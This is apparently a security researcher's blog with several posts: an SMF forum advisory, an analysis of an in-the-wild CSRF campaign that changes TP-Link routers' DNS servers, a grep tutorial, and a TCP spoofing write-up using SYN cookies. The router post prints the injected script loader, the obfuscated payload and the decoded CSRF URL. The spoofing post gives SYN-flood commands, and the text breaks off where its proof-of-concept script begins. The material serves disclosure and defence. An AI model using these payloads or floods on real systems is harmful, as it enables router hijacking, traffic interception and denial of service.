Multiple vulnerabilities in SMF forum software

I. Introduction

Simple Machines Forum (abbreviated as SMF) is a free Internet forum (BBS) software written in PHP.

II. Username faking via Unicode homoglyphs or duplicate spaces allows user impersonation

The forum registration process allows registering UTF8 usernames. Since Unicode contains a lot of additional symbols and some of them look very similar (or even identical) to standard ASCII characters, this allows registering a user with a name which is visually indistinguishable from an existing forum user. As an example, someone may register a user named "admiո" with the "n" replaced by the Unicode letter u+0578 (ARMENIAN SMALL LETTER VO), which looks more or less exactly like the ASCII character "n" depending on the font. This may be used in order to impersonate users e.g. in forum messages. Additionally to choosing a name which looks more or less exactly as the victim, an attacker can also steal the avatar of the victim in order to further improve the illusion.

The following page simplifies finding matching homoglyph characters for a given string:

http://www.irongeek.com/homoglyph-attack-generator.php

If the original username contains a space, user impersonation is also possible by registering the same username with two or more consecutive spaces. These spaces will be passed to all HTML pages containing the username and since web browsers ignore multiple consecutive spaces in HTML, there is no visible difference between the original and the faked username.

III. Clickjacking in SMF forum allows user-assisted remote arbitrary code execution

The forum software SMF contains no protection against clickjacking. This allows tricking a currently logged in user to do various unintended actions in the forum when the user visits a malicious website. I have a working POC exploit which requires no more than 2 clicks to a predictable location to achieve full remote code execution when exploited against a forum administrator (although I will not disclose the exact attack vector in this public advisory). A cleverly designed attack site may trick the user do these two clicks without much thinking. The first click can be achieved by displaying one of the annoying overlays which requests the user to fill out a survey, like the site on facebook or subscribe to a newsletter. Most users are conditioned to directly click on the small x on the top right of the overlay to close it. For the second click, the attack site may just not react to the first click hoping that the victim tries again. Alternatively, the site could also pretend to be a video site waiting for the user to click on the play button.

IV. Affected versions

All three vulnerabilities are present in SMF1 up to version 1.1.18 and SMF2 up to version 2.0.5. The SMF team has released updates (version 1.1.19 and 2.0.6) which fix the clickjacking problem (via an X-Frame-Options header) and the username faking possibility via multiple consecutive spaces. However, the Unicode homoglyph attack has not yet been fixed since it is not trivial to filter out all confusable characters while still allowing legitimate Unicode characters in usernames (especially if you can't use the Spoofchecker class because you have to support PHP versions below 5.4.0).

V. Credits

Jakob Lell

Real-World CSRF attack hijacks DNS Server configuration of TP-Link routers

Introduction

Today the majority of wired Internet connections is used with an embedded NAT router, which allows using the same Internet connection with several devices in parallel and also provides some protection against incoming attacks from the Internet. Most of these routers can be configured via a web interface. Unfortunately many of these web interfaces suffer from common web application vulnerabilities such as CSRF, XSS, insecure authentication and session management or command injection. In the past years countless vulnerabilities have been discovered and publicly reported. Many of them have remained unpatched by vendors and even if a patch is available, it is typically only installed to a small fraction of the affected devices. Despite these widespread vulnerabilities there have been very few public reports of real-world attacks against routers so far. This article exposes an active exploitation campaign against a known CSRF vulnerability (CVE-2013-2645) in various TP-Link routers. When a user visits a compromised website, the exploit tries to change the upstream DNS server of the router to an attacker-controlled IP address, which can then be used to carry out man-in-the-middle attacks.

Analysis of the exploit

This section describes one occurrence of the exploit. I have seen five different instances of the exploit on unrelated websites so far and the details of the obfuscation differ between them. However, the actual requests generated by the exploits are the same except for the DNS server IP addresses.

As you would expect for malicious content added to a website the exploit is hidden in obfuscated javascript code. The first step is a line of javascript appended to a legitimate javascript file used by the website:

document.write("<script type="\&quot;text/javascript\&quot;" src="\&quot;http://www.[REDACTED].com/js/ma.js\&quot;">");

It is possible that the cybercrooks append this line to various javascript files on compromised web servers in an automated way.

This code just dynamically adds a new script tag to the website in order to load further javascript code from an external server. The referenced file "ma.js" contains the following encoded javascript code:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('T w$=["\\E\\6\\5\\m\\o\\3\\q\\5\\m\\8\\3\\7\\"\\5\\3\\G\\5\\j\\r\\6\\6\\"\\y\\B\\d\\e\\8\\v\\4\\5\\q\\u\\4\\o\\H\\n\\5\\5\\8\\A\\j\\j\\a\\i\\e\\d\\f\\A\\a\\i\\e\\d\\f\\B\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\j\\u\\6\\3\\4\\z\\8\\e\\j\\s\\a\\f\\F\\n\\r\\8\\C\\3\\4\\l\\3\\4\\z\\8\\e\\1\\n\\5\\e\\I\\i\\n\\r\\8\\6\\3\\4\\l\\3\\4\\7\\2\\c\\d\\8\\2\\7\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\b\\b\\c\\d\\8\\h\\7\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\k\\k\\c\\s\\3\\a\\6\\3\\7\\2\\h\\b\\c\\Q\\a\\5\\3\\x\\a\\m\\7\\b\\1\\b\\1\\b\\1\\b\\c\\i\\v\\e\\a\\d\\f\\7\\c\\i\\f\\6\\6\\3\\4\\l\\3\\4\\7\\2\\b\\g\\1\\2\\9\\P\\1\\D\\g\\1\\9\\R\\c\\i\\f\\6\\6\\3\\4\\l\\3\\4\\h\\7\\9\\1\\9\\1\\9\\1\\9\\c\\C\\a\\l\\3\\7\\p\\t\\2\\p\\S\\D\\O\\p\\t\\K\\p\\J\\g\\L\\N\\E\\j\\6\\5\\m\\o\\3\\y\\q"];M["\\x\\4\\d\\5\\3\\o\\f"](w$[0]);',56,56,'|x2e|x31|x65|x72|x74|x73|x3d|x70|x38|x61|x30|x26|x69|x6d|x6e|x36|x32|x64|x2f|x39|x76|x79|x68|x6c|x25|x20|x63|x4c|x42|x75|x6f|_|x77|x3e|x52|x3a|x40|x53|x33|x3c|x44|x78|x28|x3f|x45|x34|x29|document|x3b|x2b|x37|x67|x35|x41|var'.split('|'),0,{}))

At first this code looks quite complicated and you probably don't want to manually analyze and decode it. However, it is clearly visible that the file just contains one big eval call. The parameter to eval (the code which is executed) is dynamically computed by an anonymous function based on the parameters p,a,c,k,e,d. A little bit of googling for "eval(function(p,a,c,k,e,d)" shows that this is the result of a publicly available javascript obfuscator. There are several online javascript deobfuscators you can use to reverse engineer the packed javascript. Alternatively, you can also just replace "eval" with "console.log" and then paste the code to the javascript console of Chrome Developer Tools. This just prints out the decoded javascript, which would otherwise be passed to eval. The result of the decoding is the following code:

var _$ = ["\x3c\x73\x74\x79\x6c\x65\x20\x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\x2f\x63\x73\x73\"\x3e\x40\x69\x6d\x70\x6f\x72\x74\x20\x75\x72\x6c\x28\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x6d\x69\x6e\x3a\x61\x64\x6d\x69\x6e\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x2f\x75\x73\x65\x72\x52\x70\x6d\x2f\x4c\x61\x6e\x44\x68\x63\x70\x53\x65\x72\x76\x65\x72\x52\x70\x6d\x2e\x68\x74\x6d\x3f\x64\x68\x63\x70\x73\x65\x72\x76\x65\x72\x3d\x31\x26\x69\x70\x31\x3d\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x30\x26\x69\x70\x32\x3d\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x39\x39\x26\x4c\x65\x61\x73\x65\x3d\x31\x32\x30\x26\x67\x61\x74\x65\x77\x61\x79\x3d\x30\x2e\x30\x2e\x30\x2e\x30\x26\x64\x6f\x6d\x61\x69\x6e\x3d\x26\x64\x6e\x73\x73\x65\x72\x76\x65\x72\x3d\x31\x30\x36\x2e\x31\x38\x37\x2e\x33\x36\x2e\x38\x35\x26\x64\x6e\x73\x73\x65\x72\x76\x65\x72\x32\x3d\x38\x2e\x38\x2e\x38\x2e\x38\x26\x53\x61\x76\x65\x3d\x25\x42\x31\x25\x41\x33\x2b\x25\x42\x34\x25\x45\x36\x29\x3b\x3c\x2f\x73\x74\x79\x6c\x65\x3e\x20"];
document["\x77\x72\x69\x74\x65\x6c\x6e"](_$[0]);

Although this code is still obfuscated, it can easily be understood by decoding the hex-encoded strings. The string "\x77\x72\x69\x74\x65\x6c\x6e" is the hex-encoded version of "writeln" and given the way object oriented programming in javascript works the line 'document["\x77\x72\x69\x74\x65\x6c\x6e"](_$[0]);' is just a fancy way of writing 'document.writeln(_$[0]);'. The array element _$[0] contains the stuff which is written to the document and after decoding the escaped hex characters you get the following equivalent code:

document.writeln('<style type="text/css">@import url(http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=106.187.36.85&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6);</style>')

So the obfuscated javascript adds a style tag to the current html document. The css in this style tag uses @import to instruct the browser to load additional css data from 192.168.1.1, which is the default internal IP address of most NAT routers. So it is obviously a CSRF attack which tries to reconfigure the router. The following section shows an analysis of what the request does with some TP-Link routers.

Analysis of the CSRF payload

It is obvious that the payload tries to reconfigure the options for the DHCP server included in the router at 192.168.1.1. While the parameters also include the start/end of the DHCP ip address range, the main purpose of the exploit is to change the primary DNS server to 106.187.36.85. The secondary nameserver points to a publicly available recursive DNS server (in this case the public DNS server provided by Google) in order to make sure that the user doesn't notice any connectivity problems in case the attacker-controlled nameserver is (temporarily) unavailable for any reason. Searching for the string "userRpm/LanDhcpServerRpm" quickly revealed that the exploit is targeting TP-Link routers. The fact that some TP-Link routers are vulnerable to CSRF attacks has already been publicly reported [1] by Jacob Holcomb in April 2013 and TP-Link has fixed this problem for some devices since then. Experiments have shown that several TP-Link routers are actually vulnerable to this CSRF attack (see below for an incomplete list of affected devices).

It is also worth noting that a web server should use POST instead of GET for all actions doing persistent changes to the router. This can protect against attacks in some scenarios where the attacker can only trigger loading a given URL e.g. by posting an image to a public discussion board or sending an HTML email (which could also be used to trigger attacks like this if the victim has enabled loading of remote images). However, even a POST request to the router can be issued in an automated way if the attacker can execute javascript code in the client browser. So in order to further protect against CSRF the server should either add a securely generated CSRF token or use strict referer checking (which is easier to implement on embedded devices).

The affected TP-Link routers use HTTP Basic Authentication to control access to the web interface. When entering the credentials to access the web interface, the browser typically asks the user whether he wants to permanently store the password in the browser. However, even if the user doesn't want to permanently store the password in the browser, it will still temporarily remember the password and use it for the current session. Since the session is only controlled by the browser behavior, the router can't actively terminate the session e.g. after a certain timeout or when clicking a logout button. Due to this limitation of HTTP Basic Authentication the configuration web interface has no logout button at all and the only way to terminate the session is closing and reopening the browser.

The CSRF exploit also includes the default credentials (username=admin, password=admin) in the URL. However, even if a username/password combination is given in the URL, the browser will ignore the credentials from the URL and still try the saved credentials or no authentication first. Only if this results in an HTTP 401 (Unauthorized) status code, the browser resends the request with the credentials from the URL. Due to this browser behavior the exploit works if the user is either logged in to the router or if the standard password hasn't been changed.

Consequences of a malicious DNS server

When an attacker has changed the upstream DNS server of a router, he can then carry out arbitrary man-in-the-middle attacks against users of the compromised router. Here is a list of several possible actions which can be carried out by redirecting certain dns hostnames to an attacker server:
* Redirect users to phishing sites when opening a legitimate website
* Redirect users to browser exploits
* Block software upgrades
* Attacking software updaters which don't use cryptographic signatures
* Replace advertisements on websites by redirecting adservers (that's what the dnschanger malware did [2])
* Replace executable files downloaded from the official download site of legitimate software vendors
* Hijack email accounts by stealing the password if the mail client doesn't enforce usage of TLS/SSL with a valid certificate
* Intercept communication between Android/IOS Apps and their back end infrastructure

As of now I do not know what kind of attacks the cybercrooks do with the malicious DNS servers. I have done some automated checks and resolved a large number of popular domain names with one of the DNS servers used for the attack and compared the results against a self-hosted recursive resolver. Due to the prevalence of round-robin load-balancing on DNS level and location-dependent redirection used e.g. by CDNs (content delivery networks) this automated comparison did result in a huge number of false positives and due to time constraints I could only manually verify those IP addresses which appear for a significant number of different hostnames. None of them turned out to be a malicious manipulation. However, it is very well possible that the infected routers are used for targeted attacks against a limited number of websites. If you find out what kind of attacks are carried out using the malicious DNS servers, please drop me an email or leave a comment in my blog.

Prevalence of the exploit

I discovered this exploitation campaign with an automated client honeypot system. Until now I spotted the exploit five times on totally unrelated websites. During that time the honeypot was generating some 280 GB of web traffic. The were some differences in the obfuscation used for the exploit but the actual CSRF requests generated are basically the same. The five instances of the exploit tried to change the primary nameserver to three different IP addresses and it is likely that there are more of them which I haven't spotted so far.

Recommendations to mitigate the problem

If you are using an affected TP-Link router, you should perform the following steps to prevent it from being affected by this exploit:
* Check whether the DNS servers have already been changed in your router
* Upgrade your router to the latest firmware. The vulnerability has already been patched at least for some devices
* If you don't get an upgrade for your model from TP-Link, you may also check whether it is supported by OpenWRT
* Change the default password to something more secure (if you haven't already done so)
* Don't save your router password in the browser
* Close all other browser windows/tabs before logging in to the router
* Restart your browser when you're finished using the router web interface (since the browser stores the password for the current browser session)

Affected Devices

I have already checked some TP-Link routers I had access to whether they are vulnerable to the attack. Some devices do contain the vulnerability but are by default not affected by the exploits I've seen so far because they are not using the IP address 192.168.1.1 in the default configuration.

  • TP-Link WR1043ND V1 up to firmware version 3.3.12 build 120405 is vulnerable (version 3.3.13 build 130325 and later is not vulnerable)
  • TP-Link TL-MR3020: firmware version 3.14.2 Build 120817 Rel.55520n and version 3.15.2 Build 130326 Rel.58517n are vulnerable (but not affected by current exploit in default configuration)
  • TL-WDR3600: firmware version 3.13.26 Build 130129 Rel.59449n and version 3.13.31 Build 130320 Rel.55761n are vulnerable (but not affected by current exploit in default configuration)
  • WR710N v1: 3.14.9 Build 130419 Rel.58371n is not vulnerable

It is likely that some other devices are vulnerable as well.

If you want to know whether your router is affected by this vulnerability, you can find it out by performing the following steps:
1. Open a browser and log in to your router
2. Navigate to the DHCP settings and note the DNS servers (it may be 0.0.0.0, which means that it uses the DNS server from your router's upstream internet connection)
3. Open a new browser tab and visit the following URL (you may have to adjust the IP addresses if your router isn't using 192.168.1.1):

http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.4.4&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6

If your router is vulnerable, this changes the DNS servers to 8.8.4.4 and 8.8.8.8 (the two IP addresses from Google Public DNS). Please note that the request also reverts the DHCP IP range and lease time to the default value.
4. Go back to the first tab and reload the DHCP settings in the router web interface
5. If you see the servers 8.8.4.4 and 8.8.8.8 for primary and secondary DNS, your router is vulnerable.
6. Revert the DNS settings to the previous settings from step 2
7. If your router is vulnerable, you may also upgrade it to the latest firmware and check whether it is still vulnerable.

Feel free to drop me an email or post a comment with your model number and firmware version so that I can add the device to the list above.

References

[1]: http://securityevaluators.com/content/case-studies/routers/tp-link_wr1043n.jsp
[2]: https://en.wikipedia.org/wiki/DNSChanger

Advanced grepping through directory trees with binary data

When reverse engineering stuff you often get a directory tree with a whole bunch of files (both binaries and text files) and you want to quickly find all occurrences of keywords you are interested in. Typical examples for this problem are program directories of applications, extracted Apps or the root filesystem of an embedded system.

When reverse engineering Linux-based firmware images you typically start by extracting the root filesystem (or initrd) so that you can analyze the userspace programs, scripts and configuration files. There are already some good tutorials ([1] [2] [3]) and tools like binwalk and firmware-mod-kit which automate many steps of finding/extracting the root filesystem from a binary firmware image. However, once you've got the root filesystem, you often find a whole bunch of files and it can be quite difficult to find the interesting stuff to analyze. For instance, you may find a juicy configuration variable in /etc and want to find all references to this configuration variable in the firmware. Using the standard grep utility does a good job at analyzing text files but it isn't nearly as useful for binary files, which may still contain the keyword you are looking for. By default grep only says whether the keyword is there or not and it doesn't display the context around the keyword (as it does for text files). Forcing grep to treat binaries as text files using the -a option also doesn't solve the problem either since grep will then output a whole bunch of binary data before and after the match until the next newline and you probably don't want to see this binary data in your terminal.

But luckily there are a lot of useful standard tools available on a Linux system and you can cleverly combine them to overcome this limitation. I've come up with the following command for grepping through directory trees:

find . -type f -print0|xargs -0 strings -a --print-file-name|grep -i -E ':.*your_keyword_here'|less -S

The find command just searches the current directory for files and prints the filenames to standard output separated by a null byte. Using a null byte instead of a newline makes sure that it doesn't fail if filenames in the tree contain special characters such as a spaces or newlines. Using the filter "-type f" makes sure that it only finds regular files and not directories, symlinks, devices or unix domain sockets, which may exist in your directory as well and would cause problems with the following tools.

The output of find is piped to xargs, which will call the command strings for all files found by the find command. The option "-0" tells xargs that the input is separated by null bytes instead of newlines. The program strings looks through the file and outputs all sequences of at least 4 printable characters. Since grep processes the output of strings and not the actual files, grep can't show the filename of a match (as it does when using grep to recursively search in a directory). Since you typically want to know in which files your search results are, you can use the option --print-file-names of strings so that the output contains the filename as well. The -a option of strings tells it to parse the whole file and not only certain sections of ELF files.

The next step is to use grep to filter the output of strings in order to search for a specific keyword. If you don't want to search case-insensitively, you'll have to remove the -i option of grep. Using the pattern ':.*' before the actual keyword makes sure that it won't flood your search results with all strings of a file if the filename (which is prepended by the --print-file-name of strings) already contains the keyword you are searching for.

Last but not least I recommend piping the results to less -S so that less will only use one line of the screen per result. This makes the results easier to interpret especially if you have really long lines in the results (which occasionally happens with firmware images) and you don't want to have a hundred lines of wrapped text for one single search result. You can still see the full output lines by scrolling horizontally in less (or just use the search function of less to navigate to the actual keyword).

The search can take some time especially for large directory trees. In that case you can easily speed up the process by saving the output of strings to a file:

find . -type f -print0|xargs -0 strings -a --print-file-name &gt; /tmp/strings.txt

This intermediate results can then be used for many searches:

cat /tmp/strings.txt|grep -i -E ':.*your_keyword_here'|less -S

A test with the 2.1 GB /usr/lib/ directory on my notebook created a 1.2 GB strings.txt and searching this file takes some 10 seconds given that it is still cached in memory.

The same commands can also be used for other reversing tasks such as program directories, extracted apps or even web applications (which may also include binary files like sqlite databases).

If you expect other character encodings such as utf16 (wich is quite common for Windows applications), you will need to use the -e option of strings. The following command tries ascii/utf8, utf16 and utf32:

for enc in S l L;do find . -type f -print0|xargs -0 strings -e $enc --print-file-name;done &gt; /tmp/strings.txt
cat /tmp/strings.txt|grep -i -E ':.*your_keyword_here'|less -S

Quick Blind TCP Connection Spoofing with SYN Cookies

Abstract

TCP uses 32 bit Seq/Ack numbers in order to make sure that both sides of a connection can actually receive packets from each other. Additionally, these numbers make it relatively hard to spoof the source address because successful spoofing requires guessing the correct initial sequence number (ISN) which is generated by the server in a non-guessable way. It is commonly known that a 32 bit number can be brute forced in a couple of hours given a fast (gigabit) network connection. This article shows that the effort required for guessing a valid ISN can be reduced from hours to minutes if the server uses TCP SYN Cookies (a widely used defense mechanism against SYN-Flooding DOS Attacks), which are enabled by default for various Linux distributions including Ubuntu and Debian.

I. Repetition of TCP Basics

A TCP Connection is initiated with a three-way handshake:

SYN: The Client sends a SYN packet to the server in order to initiate a connection. The SYN packet contains an initial sequence number (ISN) generated by the client.
SYN-ACK: The server acknowledges the connection request by the client. The SYN-ACK Packet contains an ISN generated by the server. It also confirms the ISN from the client in the ack field of the TCP header so that the client can verify that the SYN-ACK packet actually comes from the server and isn't spoofed.
ACK: In the final ACK packet of the three-way handshake the client confirms that it has received the ISN generated by the server. That way the server knows that the client has actually received the SYN-ACK packet from the server and thus the connection request isn't spoofed.

After this three-way handshake, the TCP connection is established and both sides can send data to each other. The initial sequence numbers make sure that the other side can actually receive the packets and thus prevent IP spoofing given that the attacker can't receive packets sent to the spoofed IP address.

Since the initial sequence numbers are only 32-bit values, it is not impossible to blindly spoof a connection by brute-forcing the ISN. If we need to send 3 packets to the server (one SYN packet to initiate the connection, one ACK packet to finish the three-way handshake and one payload packet), we will have to send 3*2^32 packets per successfully spoofed connection at an average. Given a packet rate of 300,000 packets per second (which can easily be achieved with a gigabit connection), sending this packets requires some 12 hours.

One long-known weakness of the original TCP protocol design is that an attacker can spoof a high number of SYN packets to a server. The server then has to send (and maybe even retransmit) a SYN-ACK packet to each of the spoofed IP addresses and keep track the half-open connection so that it can handle an ACK packet. Remembering a high number of bogus half-open connections can lead to resource exhaustion and make the server unresponsive to legitimate clients. This attack is called SYN Flooding and it can lead to DOS even if the attacker only uses a fraction of the network bandwidth available to the server.

II. Description of the SYN Cookie approach

In order to protect servers against SYN-Flooding attacks, Daniel J. Bernstein suggested the technique of TCP Syn Cookies in 1996. The main idea of the approach is not to keep track of incoming SYN packets and instead encode the required information in the ISN generated by the server. Once the server receives an ACK packet, he can check whether the Ack number from the client actually matches the server-generated ISN, which can easily be recalculated when receiving the ACK-packet. This allows processing the ACK packet without remembering anything about the initial SYN request issued by the client.

Since the server doesn't keep track of half-open connections, it can't remember any detail of the SYN packet sent by the client. Since the initial SYN packet contains the maximum segment size (MSS) of the client, the server encodes the MSS using 3 bits (via a table with 8 hard-coded MSS values). In order to make sure that half-open connections expire after a certain time, the server also encodes a slowly-incrementing (typically about once a minute) counter to the ISN. Other options of the initial SYN packet are typically ignored (although recent Linux kernels do support some options by encoding them via TCP Timestamps [1]). When receiving an ACK packet, the kernel extracts the counter value from the SYN Cookie and checks whether it is one of the last 4 valid values.

The original approach of Bernstein [2] only encodes the counter and the MSS value in the first 8 bits of the ISN thus leaving only 24 bits for the cryptographically generated (non-guessable) value which needs to be guessed for spoofing a connection. This can easily be brute forced within relatively short time given the speed of modern network hardware. In order to mitigate this attack, Bernstein suggests [3]:

# Add another number to the cookie: a 32-bit server-selected secret function of the client address and server address (but not the current time). This forces the attacker to guess 32 bits instead of 24.

This is implemented in recent Linux kernels and it does indeed make guessing the ISN more costly than a simple implementation without this additional secret function. However, as we will see in the next section, it does not require the attacker to guess the full 32 bit ISN.

The following function shows the generation of the SYN Cookies in the Linux Kernel 3.10.1 (file net/ipv4/syncookies.c):

#define COOKIEBITS 24	/* Upper bits store count */
#define COOKIEMASK (((__u32)1 &lt;&lt; COOKIEBITS) - 1)
 
static __u32 secure_tcp_syn_cookie(__be32 saddr, __be32 daddr, __be16 sport,
				   __be16 dport, __u32 sseq, __u32 count,
				   __u32 data)
{
	/*
	 * Compute the secure sequence number.
	 * The output should be:
	 *   HASH(sec1,saddr,sport,daddr,dport,sec1) + sseq + (count * 2^24)
	 *      + (HASH(sec2,saddr,sport,daddr,dport,count,sec2) % 2^24).
	 * Where sseq is their sequence number and count increases every
	 * minute by 1.
	 * As an extra hack, we add a small "data" value that encodes the
	 * MSS into the second hash value.
	 */
 
	return (cookie_hash(saddr, daddr, sport, dport, 0, 0) +
		sseq + (count &lt;&lt; COOKIEBITS) +
		((cookie_hash(saddr, daddr, sport, dport, count, 1) + data)
		 &amp; COOKIEMASK));
}

The value sseq is the sequence number generated by the client and is therefore directly known to the attacker. The data is an integer between 0 and 7, which encodes one of 8 possible MSS values. The count value is just a timestamp which is increased once a minute and it is encoded in the upper 8 bits of the generated cookie. However, since the first hash value is not known to the attacker, the timestamp value must be guessed by the attacker as well.

The following two functions show how the SYN Cookies are verified when receiving an ACK packet:

#define COUNTER_TRIES 4
 
/*
 * This retrieves the small "data" value from the syncookie.
 * If the syncookie is bad, the data returned will be out of
 * range.  This must be checked by the caller.
 *
 * The count value used to generate the cookie must be within
 * "maxdiff" if the current (passed-in) "count".  The return value
 * is (__u32)-1 if this test fails.
 */
static __u32 check_tcp_syn_cookie(__u32 cookie, __be32 saddr, __be32 daddr,
				  __be16 sport, __be16 dport, __u32 sseq,
				  __u32 count, __u32 maxdiff)
{
	__u32 diff;
 
	/* Strip away the layers from the cookie */
	cookie -= cookie_hash(saddr, daddr, sport, dport, 0, 0) + sseq;
 
	/* Cookie is now reduced to (count * 2^24) ^ (hash % 2^24) */
	diff = (count - (cookie &gt;&gt; COOKIEBITS)) &amp; ((__u32) - 1 &gt;&gt; COOKIEBITS);
	if (diff &gt;= maxdiff)
		return (__u32)-1;
 
	return (cookie -
		cookie_hash(saddr, daddr, sport, dport, count - diff, 1))
		&amp; COOKIEMASK;	/* Leaving the data behind */
}
 
/*
 * Check if a ack sequence number is a valid syncookie.
 * Return the decoded mss if it is, or 0 if not.
 */
static inline int cookie_check(struct sk_buff *skb, __u32 cookie)
{
	const struct iphdr *iph = ip_hdr(skb);
	const struct tcphdr *th = tcp_hdr(skb);
	__u32 seq = ntohl(th-&gt;seq) - 1;
	__u32 mssind = check_tcp_syn_cookie(cookie, iph-&gt;saddr, iph-&gt;daddr,
					    th-&gt;source, th-&gt;dest, seq,
					    jiffies / (HZ * 60),
					    COUNTER_TRIES);
 
	return mssind &lt; ARRAY_SIZE(msstab) ? msstab[mssind] : 0;
}

First of all, the server removes the first hash value and the ISN chosen by the client. This is easily possible because the hash only depends on a server secret and the source/destination address/port and doesn't change over time. Then the upper 8 bits contain the count value and if this counter is one of the last four valid counter values, it is accepted. At that point the counter used for generating the SYN Cookie is known and the server can therefore calculate the second hash and subtract it from the cookie. The remaining value is the encoded MSS value. The Cookie is only accepted if this encoded MSS value is actually a number between 0 and 7.

III. Reduced cost of guessing due to multiple valid ISNs

Since the kernel encodes a counter and the MSS value in the ISN, there must be one valid ISN for every combination of a valid counter value and a valid MSS value. In current implementations there are 4 valid counter values and 8 possible MSS values. This gives a total of 32 valid combinations which will be accepted by the server at any given time. Each of this 32 combination results in one valid ISN and if the attacker guesses any one of them, the kernel will accept the ACK packet. This reduces the effort needed to successfully guess a valid ISN by the factor 32.

Since the server doesn't remember that he has received a SYN packet when using SYN Cookies, there is no need to actually send the initial SYN packet. If we start the connection by sending an ACK packet and guess one of the 32 valid ISNs, the kernel will process the ACK packet without noticing that he has never received a SYN packet from the client and responded with a SYN-Ack packet.

IV. Combination of ACK-Packet and Payload

Although the TCP standard assumes that the three-way handshake is completed before any data is sent, it is also possible to add data to the final ACK packet of the handshake [4]. This means that guessing an ISN and spoofing a full tcp connection with some payload data (such as an http request) can be reduced to sending out only one single packet. So the average number of packets required per successfully spoofed connection can be reduced to 2^32 / 32 (because the server accepts 32 different ISNs at a time). At a packet rate of 300,000 pps (which can easily be achieved with gigabit ethernet) this amount of packets can be sent out in no more than 8 minutes (compared to the 12 hours calculated in section I).

V. Possible real-life applications of TCP Connection spoofing

Many application developers assume that TCP makes sure that the client IP address is actually correct and can't easily be spoofed. Being able to spoof the source address obviously creates significant problems when using the IP address for authentication e.g. for legacy protocols like RSH. Even if RSH has widely been replaced by more secure alternatives like SSH by now, there are still some applications where the IP address is used for authentication. For instance it is still common to have administrative interfaces which can only be accessed from certain IP addresses. Another widespread usage of IP addresses for authentication is that many web applications bind the session ID to a specific IP address. If the session ID can be stolen by other means, an attacker can use the method described here to bypass this IP address verification.

Aside from actually using IP addresses for authenticating requests, it is also quite common to log IP addresses, which may then be used to track down initiators of objectionable requests such as exploits, abusive blog comments or illegal file sharing traffic. Using the technique described here may allow planting false evidence in the logged IP addresses.

Being able to spoof IP addresses also allows bypassing SPF e.g. when sending spear phishing mails in order to give the phishing mails the additional credibility of a valid SPF sender address, which may help to bypass email filtering software.

An obvious limitation of the technique described here is that when spoofing the IP address, you can only send a request (which may result in persistent changes on the server) but not receive any responses sent by the server. For many protocols it is however possible to guess the size of the server responses, send matching ACK packets and transmit multiple payload packets in order to spoof a more complex protocol interaction with the server.

VI. POC Exploit and real-life performance measures

This section describes the steps needed to actually carry out the attack and contains full POC code. For my experimental setup the server used the IP address 192.168.1.11 and port 1234. The attacker system was located in the same local subnet and the spoofed IP address was 192.168.1.217.

First of all, even if SYN Cookies are enabled in /proc/sys/net/ipv4/tcp_syncookies (which is the default for various linux distributions), the system will still use a traditional backlog queue for storing half-open connections and only fall back to using SYN Cookies if the backlog queue overflows. The main reason for this is that storing information about connection requests allows full support of TCP Options and arbitrary MSS values (which don't have to be reduced to one of 8 predefined values). The backlog queue size is 2048 by default and can be adjusted via /proc/sys/net/ipv4/tcp_max_syn_backlog. So in order to actually carry out the spoofing attack, we have to intentionally overflow the backlog queue by doing a Syn-Flooding attack. This can be done e.g. with the hping3 command:

hping3 -i u100 -p 1234 -S -a 192.168.1.216 -q 192.168.1.11

Experiments have shown that running hping3 in parallel to the actual ISN brute-forcing does significantly reduce the packet rate even if hping3 is configured to use only a small fraction of the packet rate of the ISN brute-forcing tool. In order to achieve the maximum packet rate possible, it is therefore more efficient to run hping3 in regular short intervals. The following command sends out 3000 SYN packets in a short burst once a second:

while true;do time hping3 -i u1 -c 3000 -S -q -p 1234 -a 192.168.1.216 192.168.1.11;sleep 1;done

The source IP address used for this SYN-Flooding attack should not respond with a RST packet or return an ICMP Destination Host Unreachable message so that the queue entries aren't freed before they time out. On linux you can easily add another IP address to a network interface and block all traffic coming to this IP address in order to prevent it from responding with RST packets:

ifconfig eth0:1 inet 192.168.1.216 netmask 255.255.255.0 up
iptables -I INPUT --dst 192.168.1.216 -j DROP

I've used the same commands to set up the IP address 192.168.1.217, which is the IP address I wanted to spoof. This makes sure that sending responses to the spoofed address won't lead to a RST packet or an ICMP Destination Host Unreachable packet, which may lead to a premature termination of the connection and the processing of the spoofed request in the server software.

ifconfig eth0:2 inet 192.168.1.217 netmask 255.255.255.0 up
iptables -I INPUT --dst 192.168.1.217 -j DROP

In a real world attack, the same goal can also be achieved by issuing a (D)DOS attack against the spoofed IP address.

Once the system is in SYN-Cookie mode, it is necessary to spoof a high number of ACK packets with a payload in order to guess one of the 32 valid ISNs. I initially wanted to do this with scapy but this failed due to the utterly low performance of scapy (less then 10k packets per second). So I went on to create a pcap file in scapy, which can then be sent out with a patched version of tcpreplay in a loop. The patched tcpreplay just increases the ack field of the tcp header by 31337 for each repetition of the loop. Using an uneven number makes sure that it reaches all 2^32 possible values without repetitions. In theory you could just linearly try all possible ISNs. However, the counter value in the 8 upper bits of the ISN only changes once a minute and is linearly incremented for a given combination of source and destination address/port. Therefore a linear search will likely be in an incorrect range and not create any hit within a long time. So it is advisable to increment the guessed ISN by a larger number so that it traverses the full ISN space relatively quickly.

The following python script creates a single ACK packet with some payload data and writes the packet to a pcap file:

#!/usr/bin/python
 
